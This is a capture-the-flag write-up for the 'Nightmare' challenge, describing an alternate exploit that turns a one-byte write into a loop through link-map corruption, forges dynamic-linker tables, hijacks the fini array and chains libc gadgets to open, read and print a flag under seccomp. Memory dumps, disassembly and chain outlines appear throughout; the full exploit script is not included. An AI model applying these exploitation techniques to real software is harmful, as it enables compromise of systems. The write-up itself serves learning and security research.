Nightmare: One Byte to ROP // Alternate Solution
TLDR: One byte write, no leak.
- Infinite loop through overwrite of binaries link map
- Determination of useful rop gadget, has to fit several extensive criteria
- Partial overwrite of DT_JMPREL table pointer
- Partial overwrite of DT_STRTAB pointer
- Overwrite of LIBC link map
- Loop 2-5 until rop chain has been created
- Partial overwrite of DT_FINI_ARRAYSZ pointer
- Use 3 & 4 to call exit, to call rop chain
Prologue
This challenge was extremely difficult and I recommend reading the original author's writeup to see how intense the intentional method is, https://hackmd.io/@pepsipu/ry-SK44pt. Now with that mentioned, I'm going to show you a method that ignores most of the primatives stated in the article and go a complete different approach that even the author thought was impossible.
The images above show the struggle that is about to be encountered and not to harass or cause any trouble.
I won't go into every approach I took on this challenge as the first 3ish days I took a wrong approach that I think will turn into a nice ctf challenge in the future so look out for a modified nightmare in the future.
Next, to fully get a understanding of this challenge I recommend looking up some ret2dlresolve
writeups and learning about the different structures used in looking up a function during lazy loading.
Lastly, I was not able to get a final working solution on remote and I think this has to do with some offset being incorrect, I was able to get a working version on the remote while writing this writeup, just took a bit of time and thinking to figure out what was wrong, it was because the remote had a different offset than local version, but previously this was because of a bad rop gadget I was using, who would of guessed that puts will call different functions depending on CPU capabilities. Any address that I use in the writeup, I'll try to keep consistant, but these values are not the same as the remote version so don't worry about them too much. With this all said, I'll start with the actual walkthrough!
Lastly 2, sorry for such a long writeup, I wanted to share as much detail but still kept most of the useless information out. So if you want you can probably skip to the sections you are most interested in.
Description and hint 1 & 2
Can you pwn when you can't see?
Hint: Partial RELRO? That sounds like a really complex surface...
Hint 2: What happens if Exit doesnt exit?
nc mc.ax 31477
Setup and Reversing
Upon downloading the files and extracting from the zip, we are given a README.md file giving the description below.
## Setup
Nightmare is an extremely environment sensitive challenge. It's important your environment is as accurate as possible.
Tools such as patchelf will clobber continuity between local and remote. Please take care making changes.
You might have noticed that no libc was shipped with this challenge. This is intentional. Please do NOT try to exploit
the binary outside of the provided Docker and utilize the libc and ld within the docker.
You are safe to install tools and other items in the docker. The docker tag is `[email protected]:cc8f713078bfddfe9ace41e29eb73298f52b2c958ccacd1b376b9378e20906ef`.
### Symbols
You can install debug symbols by installing libc6-dbg package. From there, please do NOT unstrip the global libc and ld.
Make a copy and unstrip them without affecting /usr/lib. An unstripping script is provided.
## Remote
Nightmare's remote requires you to submit a static payload to the program. This payload will then be sent to 8 different instances of Nightmare, all of which have `stdout` hidden from the competitor. This prevents leaking ASLR base and bruteforce. In order to submit a payload, simply:
- Send the size of the payload packed as a 8 byte integer
- Send the payload
## Security Measures
The seccomp used can be found in `bin/filter.s`.
So given this information lets first check the seccomp, I'm privy to using seccomp-tools
to determining the seccomp in place
# seccomp-tools dump ./nightmare
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x08 0x00 0x00000000 if (A == read) goto 0012
0004: 0x15 0x07 0x00 0x00000001 if (A == write) goto 0012
0005: 0x15 0x06 0x00 0x00000002 if (A == open) goto 0012
0006: 0x15 0x05 0x00 0x0000003c if (A == exit) goto 0012
0007: 0x15 0x04 0x00 0x000000e7 if (A == exit_group) goto 0012
0008: 0x15 0x01 0x00 0x00000009 if (A == mmap) goto 0010
0009: 0x05 0x00 0x00 0x00000003 goto 0013
0010: 0x20 0x00 0x00 0x00000020 A = prot # mmap(addr, len, prot, flags, fd, pgoff)
0011: 0x45 0x01 0x00 0x00000004 if (A & 0x4) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0013: 0x06 0x00 0x00 0x00000000 return KILL
We can see we are only allowed read, write, open, and mmap as somewhat useful gadgets... except that the the extra restriction on the prot argument of mmap, disallows PROT_EXEC
from any chunks we create, so this seems less useful.
Let's start reversing.
This is a relatively clear main, so we are looking for something else. We can see a function called nightmare
and after some digging you can find that this is called in __libc_csu_init
being a part of the _init_array
list.
So looking at the actual nightmare
function we can see a check to the data at chunk
, which may seem weird for function that should only run once... hint hint. A malloc
of a large size is stored in chunk
and a call to the seccomp setup, the seccomp is normal setup and I don't believe there is anything new being done that requires a further analysis.
Next we have the actual meat of the function, there are 2 reads, one of 8 bytes and another of 1 byte. The first 8 bytes are used as an offset of the malloced chunk and the 1 byte is written to that location. After this a call to write
and then _Exit
.
Notes:
There are 2 things to realize from this analysis so far, first is the malloc
. Typically, mallocs of large sizes will need to invoke a new mmap
call, this call creates a new page in the memory map scene and usually will be located at the same offset from libc. The memory map below is just an example on my host system and does not use the correct environment but will suffice for the example:
0x00007ffff7dd8000 0x00007ffff7dda000 0x0000000000000000 rw- <-- newly mmapped chunk
0x00007ffff7dda000 0x00007ffff7e00000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7e00000 0x00007ffff7f49000 0x0000000000026000 r-x /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f49000 0x00007ffff7f94000 0x000000000016f000 r-- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f94000 0x00007ffff7f95000 0x00000000001ba000 --- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f95000 0x00007ffff7f98000 0x00000000001ba000 r-- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f98000 0x00007ffff7f9b000 0x00000000001bd000 rw- /usr/lib/x86_64-linux-gnu/libc-2.32.so
The malloc'd chunk in this example is located at 0x00007ffff7dd8010
and will always be at the same offset from libc, now take note that this will depend on your kernel and libc version, this comes into play later. From this, we also know that the ld is typically at a constant offset from libc as well.
Second, now this doesn't play as big of a role in this challenge but there is a difference between the function Exit
and _Exit
. Exit
will ultimately call another function called __run_exit_handlers
while _Exit
will flat out use the system call exit
right away without calling any extraneous functions. Not too important for this exploit but does come into play with different exploits.
Infinite Loop
With our ability to write one byte we are extremely limited, luckily we can write to anything that is writeable in libc or the ld. So we need to find something good to write to that allows us to get more functionality or more writes. Now at the beginning of this challenge, I didn't know exactly where to write to so I wrote a quick brute force script to find an address that would cause the program to hang that we could work with, my thought being that this means we found a way to call nightmare again. I'm not going to share the actuall script but imagine a loop that goes over all writeable addresses by sequence of 8 bytes and testing all 256 bytes for something that works. Luckily I found 2 hits, 33 and 40, both at the same address ld+0x36220 and looking at this address we see this:
0x7ffff7ffe220: 0x0000555555554000 0x00007ffff7ffe7c8
0x7ffff7ffe230: 0x000055555555a000 0x00007ffff7ffe7d0
0x7ffff7ffe240: 0x0000000000000000 0x00007ffff7ffe220
0x7ffff7ffe250: 0x0000000000000000 0x00007ffff7ffe7b0
0x7ffff7ffe260: 0x0000000000000000 0x000055555555a010
0x7ffff7ffe270: 0x000055555555a0f0 0x000055555555a0e0
0x7ffff7ffe280: 0x0000000000000000 0x000055555555a090
0x7ffff7ffe290: 0x000055555555a0a0 0x000055555555a120
0x7ffff7ffe2a0: 0x000055555555a130 0x000055555555a140
0x7ffff7ffe2b0: 0x000055555555a0b0 0x000055555555a0c0
0x7ffff7ffe2c0: 0x000055555555a020 0x000055555555a030
0x7ffff7ffe2d0: 0x0000000000000000 0x0000000000000000
Some of the addresses may be hard to recognize right away, but the first pointer is the address where our binary is loaded, now I'm not 100% confident but I believe that this chunk of data is refered to as the link map of the binary. A crappy description of this structure would be a structure that holds pointers to important information used in the binary, sorry but I couldn't refind the blog post about it I read during research, but we will notice that this address is also stored before the binary GOT in memory
0x555555558000: 0x0000000000003df8 0x00007ffff7ffe220 <---- Link map
0x555555558010: 0x00007ffff7fe0ee0 0x0000555555555036 <---- _dl_runtime_resolve | exit_plt
0x555555558020 <__st[email protected]>: 0x0000555555555046 0x00007ffff7eaf900
Now we need to take an in depth look into what happens when we overwrite the first pointer in the link map. As we know during a function call the instruction flow is actually sent to the plt
, then from there a lookup from the GOT, and if this is not found we make a call to _dl_runtime_resolve
, this function ultimately sets up a call _dl_fixup
with the linkmap and the offset for the function as the arguments, _dl_fixup
is responsible for calling other functions that actually lookup of your function by using pointers in the link map, storing this value in the got, then ultimately returning the address to _dl_runtime_resolve
where it jmps to the function it looked up.
If you remember our brute force was able to find a write of either 33 or 40 to the link map, what does this mean though. As it turns out, in _dl_fixup
the first pointer in the link map is used for a base to write for the got address, the offset being the value specified in the JMPREL table in the binary.
Normally, write would be stored at binary+0x4018
, but by placing 40
we now fool _dl_fixup
to store the address of write at binary+0x4018+40
or binary+0x4040
, which happens to be the got address for _Exit
. Instead of _Exit
being looked up, we just end up calling write instead, if you remember back to the reversing function there is no ret call after the _Exit
, instead whatever function next will be called, this happens to be main
then _libc_csu_init
, which is the function that calls nightmare
for us. This is how our infinite loop works for us, now if you are looking closely you may notice that RDI
is set to 0 before the _Exit
,(write
), call and think that the program is writing to stdin, but write just fails in this instances so we don't need to worry about anything.
You may remember that both 33 and 40 worked as values, if you look at 33 this is actually a partial overwrite of the _Exit
GOT value with the upper byte of the address of the write
function in libc, 0x00. Instead of normally pointing to its plt section at of 0x1086 it now points to 0x1000, which happens to be _init_proc
and this calls _gmon_start__
which will call __libc_csu_init
for us.
Either should work, but they will effect the stack differently if you plan to implement this yourself and use different rop gadgets later on.
Function Lookup
At this point, we have an infinite write but what do we really target, we also have an infinite lookup for the function write
, as we never overwrite it's GOT address and instead overwrote _exit
. If we keep looking through _dl_fixup
we will notice that several of the pointers are referenced to determine what function should be found, one of these is link_map+0x68
, or the string table lookup pointer. Since we don't know where we are in memory binary or libc wise, we are stuck with partial offsets, luckily for us, there happens to be a pointer nearby that points to a variable called _r_debug
, more importantly a writeable piece of memory.
0x558e56a95e78: 0x0000000000000005 0x0000558e56a92500 <-- string table
0x558e56a95e88: 0x0000000000000006 0x0000558e56a923e0
0x558e56a95e98: 0x000000000000000a 0x00000000000000b6
0x558e56a95ea8: 0x000000000000000b 0x0000000000000018
0x558e56a95eb8: 0x0000000000000015 0x00007f9cb24ca100 <--- _r_debug
If we set a string at _r_debug+0x4b
, the original offset into the string table for the write function name, we can now call whatever function we want. At this point I got stuck for a bit as I couldn't figure out a great primative to do anything with this, as we don't control the arguments and we only call the beginning of each function, what can we do? If we utilize the same primative we used to overwrite _Exit
GOT we can write to the memory after the GOT, but we are limited to 0xfe-ish bytes past the _Exit
got.
At this point I was stuck, so I wrote another brute force to try and find something useful... This one was with a modified nightmare binary that allowed me to write 8 bytes at once to an address, this allowed me to quickly search for any segfaults that occur that we could maybe use. After some checking I found one at libc+0x228000
, in the memory map between the libc and the ld,
0x7f9cb2490000: 0x00007f9cb2268000 0x00007f9cb24caee0
0x7f9cb2490010: 0x00007f9cb247fbc0 0x00007f9cb24c9a48
0x7f9cb2490020: 0x00007f9cb24ca7d0 0x00007f9cb2490000
0x7f9cb2490030: 0x0000000000000000 0x00007f9cb2490490
0x7f9cb2490040: 0x0000000000000000 0x00007f9cb247fbc0
0x7f9cb2490050: 0x00007f9cb247fc70 0x00007f9cb247fc60
0x7f9cb2490060: 0x00007f9cb247fc00 0x00007f9cb247fc20
0x7f9cb2490070: 0x00007f9cb247fc30 0x00007f9cb247fca0
0x7f9cb2490080: 0x00007f9cb247fcb0 0x00007f9cb247fcc0
0x7f9cb2490090: 0x00007f9cb247fc40 0x00007f9cb247fc50
0x7f9cb24900a0: 0x0000000000000000 0x0000000000000000
0x7f9cb24900b0: 0x00007f9cb247fbd0 0x0000000000000000
This chunk of memory actually has the same layout as our binary link_map, and infact is libc's link_map. The pointers here point to all sorts of goodies such as the function lookup table, which I didn't even attempt to forge as I thought it would be too much of a pain to work out custom functions, if it's even possible. That's a whole sub series of libc internals I want to stay away from. Now, when we overwrite this first pointer we get a segfault when trying to jump to what should be the function offset of write from inside dl_runtime_resolve
. With RIP
being 0x1179a0
, or the exact offset to write from the beginning of libc, so with a partial overwrite of this it looks like we can now control an offset into a function to call, similarly to our write ability with our binary.
PIVOT
The previous primative sounds perfect for gadgets... kind of. You have to remember that any gadget we use will ultimately be called during the lookup, we will need to make a chain that effectively can be called in the moment as well as be stored in memory utilizing our past GOT write, with these we can setup a chain after the pivot to. How do we actually pivot to it though? We don't control any arguments or registers when the gadgets are called, and there is NO useful data on the stack that points anywhere near where our chain would be. So how do we get to our chain, this is a little out of order as I thought this had to be the intended way and was confident a pivot existed, and was later crushed by the author when his hints made it sound like this was impossible but one hint did help. On the last night, after learning that he had full control of the arguments for _dl_lookup, which at this point I thought was a dream.
Even though at this point I knew our approaches were different enough to merit almost giving up, I hoped that maybe there was something of use here, looking at the source code I found one glimmer of hope.
while (i-- > 0)
((fini_t) array[i]) ();
Now how do we get there, as nice as our lookup primative is, it doesn't actually work for all functions and symbols and as such we can't use our fake string table to fake a call to _dl_fini
. Testing out some different things, I started to wonder if other functions would reference it, the big target being the regular Exit
function, as the name _dl_fini
suggests maybe this is something that should be called to help clean up memory and a binary, and lo-and-behold we are greeted with execution passing through _dl_fini
after calling Exit
. After some digging, we are able to determine that this fini_t array
above in the source code is actually the fini array
from our binary, at binary+0x3df0
.
If you don't know about the dtors/fini_array
, it is a list similar to the one that houses the nightmare
call in the beginning of the program usually called the _init_array
, but the opposite, instead of helping build up for the binary to execute, it helps tear it down, currently all that is in this list is a pointer to the binary's function __do_global_dtors_aux
. To me the code can be a bit obscur as to how the fini_t array is set but I'll show you anyways
ElfW(Addr) *array =
(ElfW(Addr) *) (l->l_addr
+ l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
/ sizeof (ElfW(Addr)));
while (i-- > 0)
((fini_t) array[i]) ();
If you can't figure out what is happening here just by looking I don't blame you, but what if I told you that l
is our binary link_map
. Then it may make a more sense, so this is saying that l->addr + l->l_info[fini_array]->ptr
is our array, or more precisely. Binary address + fini_array offset
, but it is important to realize that we can overwrite the pointer to fini_array offset
and the original Binary address
, as they both are stored in the link_map
; problem is, we still can't get a pivot to our fake stack this way:
0x558e56a95e08: 0x000000000000000c 0x0000000000001000
0x558e56a95e18: 0x000000000000000d 0x0000000000001478
0x558e56a95e28: 0x0000000000000019 0x0000000000003de0 <--- fini array offset
0x558e56a95e38: 0x000000000000001b 0x0000000000000010
0x558e56a95e48: 0x000000000000001a 0x0000000000003df0 <--- init array offset
0x558e56a95e58: 0x000000000000001c 0x0000000000000008 <--- fini array size
0x558e56a95e68: 0x000000006ffffef5 0x0000558e56a923c0
0x558e56a95e78: 0x0000000000000005 0x0000558e56a92500
0x558e56a95e88: 0x0000000000000006 0x0000558e56a923e0
0x558e56a95e98: 0x000000000000000a 0x00000000000000b6
0x558e56a95ea8: 0x000000000000000b 0x0000000000000018
0x558e56a95eb8: 0x0000000000000015 0x00007f9cb24ca100
0x558e56a95ec8: 0x0000000000000003 0x0000558e56a96000
0x558e56a95ed8: 0x0000000000000002 0x0000000000000090
0x558e56a95ee8: 0x0000000000000014 0x0000000000000007
0x558e56a95ef8: 0x0000000000000017 0x0000558e56a926d8
We could try to move the fini_array offset
to point to something else, but you still need to remember we are dealing with only single byte overwrite, so we will need so stay in the same byte range, sadly no offsets would get us to our fake stack, but you may have noticed 2 things, first the fini array offset is off by 8 bytes from where it actually is in memory. Looking back at the source, you may see the variable i
being set and used as an index, so we are effectivly starting at index 1 and not going lower than that. But this i
variable is set from the link map as well so what if we forged the size since it seems to be going from the top index to the bottom first, 0x90 or 0xb6 look like good targets but are still not enough to get us from index 0x3de0, fini array
, to 0x4010+, our rop chain location. What about the 0x1000 at the top of the list though, using that we now make the program think fini array has 0x200 indexes and will start at 0x4de0, or writeable memory. Only problem is, we currently can only write 0xfe-ish past _Exit
GOT, approx 0x4100, no where near 0x4de0.
I got stuck here for a bit thinking that all the hopes and dreams for a perfect setup had been squashed, until I did some testing, below is the _r_debug
data.
0x7f9cb24ca100 <_r_debug>: 0x0000000000004db0 0x00007f9cb24ca207
0x7f9cb24ca110 <_r_debug+16>: 0x00007f9cb24a6170 0x0000000000000000
0x7f9cb24ca120 <_r_debug+32>: 0x00007f9cb2494000 0x0000000000000000
0x7f9cb24ca130: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca140: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca150: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca160: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca170: 0x0000000000000000 0x0000000000000000
At the time, I was under the impression that this data was important and actually thought it was referenced during _ld_fixup
, but I thought it was worth a try and zeroed it out, to my surprise no crash. This is the target now. If you remember back, our fake string is located at _r_debug+0x4b
, and if we can fake the string table why not fake the jmp_rel
table, as this holds the offset into the binary to truely store the address loaded from _ld_fixup
, look how lucky this turned out to be:
0x558e56a95e08: 0x000000000000000c 0x0000000000001000
0x558e56a95e18: 0x000000000000000d 0x0000000000001478
0x558e56a95e28: 0x0000000000000019 0x0000000000003de0 <--- fini array offset
0x558e56a95e38: 0x000000000000001b 0x0000000000000010
0x558e56a95e48: 0x000000000000001a 0x0000000000003df0 <--- init array offset
0x558e56a95e58: 0x000000000000001c 0x0000000000000008 <--- fini array size
0x558e56a95e68: 0x000000006ffffef5 0x0000558e56a923c0
0x558e56a95e78: 0x0000000000000005 0x0000558e56a92500 <-- string table
0x558e56a95e88: 0x0000000000000006 0x0000558e56a923e0
0x558e56a95e98: 0x000000000000000a 0x00000000000000b6
0x558e56a95ea8: 0x000000000000000b 0x0000000000000018
0x558e56a95eb8: 0x0000000000000015 0x00007f9cb24ca100 <--- _r_debug
0x558e56a95ec8: 0x0000000000000003 0x0000558e56a96000
0x558e56a95ed8: 0x0000000000000002 0x0000000000000090
0x558e56a95ee8: 0x0000000000000014 0x0000000000000007
0x558e56a95ef8: 0x0000000000000017 0x0000558e56a926d8 <-- jmp_rel table
With this being on the same 0x100 boundary as _r_debug
, we can point it at _r_debug
and now have a fake jmp_rel
index to write to the 0x4de0 offset we need! With that we can finally create the chain load it into a fake fini array
location and jump down the chain.
ROP Till You Drop
I know what you are thinking, the hardest part is done and all that needs to be done is create the chain and win, that is where you would be wrong. If I had to guess I would say that this is the worse part of the challenge and took over 80% of my time on this challenge. For the following reasons,
-
Each gadget that is stored in our array, will be called in the
_dl_runtime_resolve
function. This means no gadgets that pop from the stack, or modifyRSP
as we need a way to get back to ournightmare
function successfully. -
Each gadget can be at an offest of at most 0xff from a valid function lookup, I don't know how many times I found a gadget I wanted, but the symbol wouldn't resolve, or I found a perfect gadget but it isn't near a function
-
The function that houses our gadget has to have a return primative that lines up with write as well, this is kind of vague but let's think this through. Our primative for this exploit is essentially a 1 byte write; then for a lookup we need to setup a string in memory, point to this string, then change to an offset into this function to store in our fini array. This can't be done all at once, we need to have a setup where we can do all this things without crashing or referencing data from a register that isn't a pointer. This means jumping into an offset of write, then changing to our function, changing to the address we want to store, change our stack pointer so we don't overwrite it, change back to the old address of our function, then change back to write, rinse repeat.
-
We can't use the
RDX
register, this may be a bit confusing but look at the assembly below from_dl_fini
:0x00007ffff7fe2483 <+403>: mov r14,QWORD PTR [rax+0x8] 0x00007ffff7fe2487 <+407>: mov rax,QWORD PTR [r15+0x120] 0x00007ffff7fe248e <+414>: mov rsi,QWORD PTR [r15] 0x00007ffff7fe2491 <+417>: mov rdx,QWORD PTR [rax+0x8] 0x00007ffff7fe2495 <+421>: add rsi,r14 0x00007ffff7fe2498 <+424>: shr rdx,0x3 0x00007ffff7fe249c <+428>: mov QWORD PTR [rbp-0x38],rsi 0x00007ffff7fe24a0 <+432>: lea eax,[rdx-0x1] 0x00007ffff7fe24a3 <+435>: lea r14,[rsi+rax*8] 0x00007ffff7fe24a7 <+439>: test edx,edx 0x00007ffff7fe24a9 <+441>: je 0x7ffff7fe24c0 <_dl_fini+464> 0x00007ffff7fe24ab <+443>: nop DWORD PTR [rax+rax*1+0x0] 0x00007ffff7fe24b0 <+448>: call QWORD PTR [r14] <-- call our array item 0x00007ffff7fe24b3 <+451>: mov rdx,r14 0x00007ffff7fe24b6 <+454>: sub r14,0x8 0x00007ffff7fe24ba <+458>: cmp QWORD PTR [rbp-0x38],rdx 0x00007ffff7fe24be <+462>: jne 0x7ffff7fe24b0 <_dl_fini+448>
R14
points to our fini array and will be called at line 448, but after it stores this value intoRDX
thereby clobbering any data we store in there, this wouldn't be a problem if read, write, and partially open didn't all useRDX
as the third argument. You may be thinking, why not just pivot to the stack at this point if rdx points to your fini array, a call to setcontext would get you a win, but don't forget point 1 above. All stored values need to be called at least once, so a pivot to rdx will crash our program way before this issue comes up.
In my opinion all of these points turned out to be the hardest aspects of this challenge. Hence the name of this section, ROP till you drop, I began to understand why the author thought this was impossible.
So the next section will just show the gadgets I was able to find then will put it all together into a coercive chain to understand. I don't think I can articulate the approx 20+ hours probably spent just looking for ROP gadgets. I also won't show the offsets that I had to find within write and them so I could load it into memory successfully. If you want to see them all they are in the exploit file.
RSI Gadget
Looking for gadgets we should lay out what we actually need to do,
mov rax, 2
mov rdi, "flag.txt/x00"
mov rsi, 0
syscall = open syscall
mov rdi, rax
mov rax, 0
mov rsi, {Buffer} for flag to read to
mov rdx, value less than 0x1000 (I'll explain below)
syscall = read syscall
mov rax, 1
mov rdi, 1
mov rsi, {Buffer} To print out flag
mov rdx, value less than 0x1000
syscall = write syscall
**Crash gloriously in victory**
This entire chain is dead if we can't load flag.txt
, so this may be one of the most important gadgets. I actually accidently stumbled upon this this gadget as I was working on a dead end earlier and had far harder constraits to work with. But behold,
0x7f9cb238a8f0 <hcreate>: endbr64
0x7f9cb238a8f4 <hcreate+4>: lea rsi,[rip+0xfe835] <--writeable address
0x7f9cb238a8fb <hcreate+11>: jmp 0x7f9cb238a900 <hcreate_r>
0x7f9cb238a900 <hcreate_r>: endbr64
0x7f9cb238a904 <hcreate_r+4>: test rsi,rsi
0x7f9cb238a907 <hcreate_r+7>: je 0x7f9cb238a9bb <hcreate_r+187>
0x7f9cb238a90d <hcreate_r+13>: push rbx
0x7f9cb238a90e <hcreate_r+14>: xor eax,eax
0x7f9cb238a910 <hcreate_r+16>: cmp QWORD PTR [rsi],0x0
0x7f9cb238a914 <hcreate_r+20>: mov rbx,rsi
0x7f9cb238a917 <hcreate_r+23>: je 0x7f9cb238a920 <hcreate_r+32>
0x7f9cb238a919 <hcreate_r+25>: pop rbx
0x7f9cb238a91a <hcreate_r+26>: ret
You can look up the function in further detail but it effectively will create a memory space for a hash table, unless it decides a hashtable has already been created, but the best part is that the address loaded is writeable and we can put "flag.txt" there before we jump to our chain. You may thinking that this is somewhat pointless as RSI
is not RDI
and we still can't open it, but what would be the second most important part of the chain?
Syscall and Friends
You probably think that this is an easy gadget to secure, and boy would you be wrong. Thinking this through, we need an open syscall first, why not just call open, since we should be able to look it up and it should pass as syscalls usually don't cause segfaults but just fail. This is why, here are the only two syscalls in the open function:
...
0x7f9cb237f664 <open64+84>: mov eax,0x101
0x7f9cb237f669 <open64+89>: syscall
...
0x7f9cb237f6dd <open64+205>: mov eax,0x101
0x7f9cb237f6e2 <open64+210>: syscall
...
Now who in the right mind thought that the open function should use open the open_at syscall instead. Now not only is this function dead, but there are no instances of mov r/eax, 0; syscall
or something similar that is usable anywhere in libc. Normally this wouldn't be a problem but the seccomp limits us and any other syscalls ran will kill execution. This is also the reason we can't just jump right before a syscall, such as open64+89
, as RAX
is clobbered during _dl_fixup
and stops us from just saving a raw syscall. So we need a way around this, what about the syscall function:
0x00007f9cb2389930 <+0>: endbr64
0x00007f9cb2389934 <+4>: mov rax,rdi
0x00007f9cb2389937 <+7>: mov rdi,rsi
0x00007f9cb238993a <+10>: mov rsi,rdx
0x00007f9cb238993d <+13>: mov rdx,rcx
0x00007f9cb2389940 <+16>: mov r10,r8
0x00007f9cb2389943 <+19>: mov r8,r9
0x00007f9cb2389946 <+22>: mov r9,QWORD PTR [rsp+0x8]
0x00007f9cb238994b <+27>: syscall
0x00007f9cb238994d <+29>: cmp rax,0xfffffffffffff001
0x00007f9cb2389953 <+35>: jae 0x7f9cb2389956 <syscall+38>
0x00007f9cb2389955 <+37>: ret
0x00007f9cb2389956 <+38>: mov rcx,QWORD PTR [rip+0xf64b3] # 0x7f9cb247fe10
0x00007f9cb238995d <+45>: neg eax
0x00007f9cb238995f <+47>: mov DWORD PTR fs:[rcx],eax
0x00007f9cb2389962 <+50>: or rax,0xffffffffffffffff
0x00007f9cb2389966 <+54>: ret
This bundles a syscall into argument style, so not only could we set RDI
to 2 then call this, this will also move our flag into RDI
to complete the write, and we can call this from our lookup as RDI
will be 1 for the write call, making this turn into a write call that ultimately fails in the original lookup. This would be perfect except 1 issue... mov rsi,rdx
. We have no control or RDX
except we can guarantee it will point to our last gadget called in our fini_array
. So the only way I could think of to do this is to use the beauty of syscalls
, sub rcx, rax
, and a push rcx; ret
.
If you are not aware syscalls will use the registers in this order rdi, rsi, rdx, r10,r8,r9
, why no RCX
? Infact, RCX
is set to the next address after a syscall, so if we have a successful or not successful syscall the return(? not sure what else to call it) address
is stored into RCX
, then we just subtract 2 bytes and find a way to jump to RCX
. There were jump RCX
gadgets, but for some reason I decided on the push rcx; ret
, can't remember if I just couldn't find a working jmp
or not. You may be thinking that this shouldn't pass the lookup function, but it does barely. Using the ability above, after a syscall
, RCX
is set, which means that RCX
points to the address right after the syscall
in read
, so we push that address and then return safely back to nightmare
So here are the two gadgets:
0x7f9cb22cc3fa <printf_size_info+26>: mov eax,0x1
0x7f9cb22cc3ff <printf_size_info+31>: ret
0x7f9cb22fa888 <_IO_adjust_column+40>: sub rcx,rax
0x7f9cb22fa88b <_IO_adjust_column+43>: lea eax,[rcx-0x1]
0x7f9cb22fa88e <_IO_adjust_column+46>: ret
Given the gadget for sub rcx, rax
I either needed to do it twice as rax
will get clobbered, or find an add rax, 1
0x7f9cb2317250 <envz_get+32>: add rax,0x1
0x7f9cb2317254 <envz_get+36>: test dl,dl
0x7f9cb2317256 <envz_get+38>: mov edx,0x0
0x7f9cb231725b <envz_get+43>: cmove rax,rdx
0x7f9cb231725f <envz_get+47>: ret
Luckily RDX
is never zero and the DL
check can be avoided, but since we changed the method of calling syscall, RSI
still points to the flag now. So we need to call syscall
once to have it fail, this allows us to move RSI
into RDI
. Normally this would also set RCX
but in the source of syscall
, for some reason, sets the error code into RCX
first, so for this I called write instead, setting RCX
to that syscall instead.
RSI = Zero , RDI, and Full OPEN
Now we still need to get RSI
to zero as we want to open the flag as read, finding a gadget for this was a bit tough. By utilizing the hcreate
function above to set RSI
to the flag, we can then and esi, 0x200
to get the zero we desire.
0x7f9cb239eee0 <__memcpy_chk+64>: and esi,0x200
0x7f9cb239eee6 <__memcpy_chk+70>: lea rdx,[rip+0x74353] # 0x7f9cb2413240
0x7f9cb239eeed <__memcpy_chk+77>: lea rax,[rip+0x743bc] # 0x7f9cb24132b0
0x7f9cb239eef4 <__memcpy_chk+84>: cmove rax,rdx
0x7f9cb239eef8 <__memcpy_chk+88>: ret
This one was close as, __memcpy_chk
doesn't actually resolve, but luckily the function right before does resolve, good 'ol __cyg_profile_func_exit
. Luckily based on the address I was using for the flag file name, anding with 0x200 resulted in 0.
With this out of the way now we can set RDI
, this is only important in the case of the first syscall we need to make as it still needs to be a valid syscall to move to RAX
So here is that gadget:
0x7f9cb22c60d3: mov edi,eax
0x7f9cb22c60d5: cmp rdx,rcx
0x7f9cb22c60d8: jae 0x7f9cb22c60bc
0x7f9cb22c60da: mov rax,r8
0x7f9cb22c60dd: ret
This is at cuserid+243
, the one catch is that RCX
needs to be greater than RDX
or this won't work. As it jumps away and does some garbage, then crashes. Since RDX
is near our chain, the only way I could figure this out a way to set RCX
higher was another syscall
.
So the full chain for open
becomes:
set rsi to flag mem
write function , sets rcx higher than rdx
mov rax, 1
mov rdi, rax
syscall func, mov rdi, rsi
set rsi to flag
and esi, 0x200, zero rsi
mov rax, 1
add rax, 1
sub rcx, rax; resets rax
mov rax, 1
add rax, 1, set rax to open
push rcx; ret
Not too shabby!
Read problems
For the read syscall, we can't just call the read
function as RDX
will be a large value and you wouldn't guess it but, read needs the third argument to be around 0x1000 as a max. So we need a way to set RDX
and call syscall, this turned into a huge headache, but eventually I was able to think of a solution.
If we utilize the syscall
function we can move a value from RCX
into RDX
, allowing us to get a smaller value in there if we can control RCX
. We have a rough estimate at what RCX
equals, as we just used a syscall. So I found this gadgets to help lower make RCX
usable:
0x7f9cb22b27c6 <rand_r+70>: and ecx,0x3ff
0x7f9cb22b27cc <rand_r+76>: xor eax,ecx
0x7f9cb22b27ce <rand_r+78>: ret
Next we need to set RSI
to our File Descriptor, I could have just assumed 3 and worked with it but the gadgets I found let me move the value from RAX
just as easily, by utilizing the zeroing out of RSI
from earlier, a move from RAX
to RDI
, and finally the gadget below.
0x7f9cb22ad924: or esi,edi
0x7f9cb22ad926: movd xmm0,esi
0x7f9cb22ad92a: ret
This was found at modff+0xe4
RDI/RAX and Read Chain
We also need to have RDI
be 0, there are several ways this could be done, the method I took was to make RAX
become -1 then use the add 1 gadget from earlier. This can easiliy be done with just a call to write that will fail, there by returning -1 as an error.
We should be able to create a chain building off the previous open to read from the flag, but wait what about RSI
during the actual syscall function. Since RSI
is set to the value at RDX
this works alright, it isn't perfect as we don't have full control of the location but we do know that it is writeable memory and that is all that really matters for now.
mov rdi, rax
set rsi, to flag , also zeros out rax
and esi, 0x200
or esi, edi
write call, rax = -1
add rax, 1
mov rdi, rax
and rcx, 0x3ff
syscall func
Write chain
Now we have most of the gadgets, we need for a write call as well, write follows the same guadlines as read, so we need to make RDX
smaller again through RCX. And our same gadgets should still work, RSI
won't point to the exact same address as where we stored the flag but will still point to the fake fini_array
and we can print the data before and after it.
set rsi, to flag
mov rax, 1
mov rdi, rax
and esi, 0x200
or esi, edi
and rcx, 0x3ff
syscall function
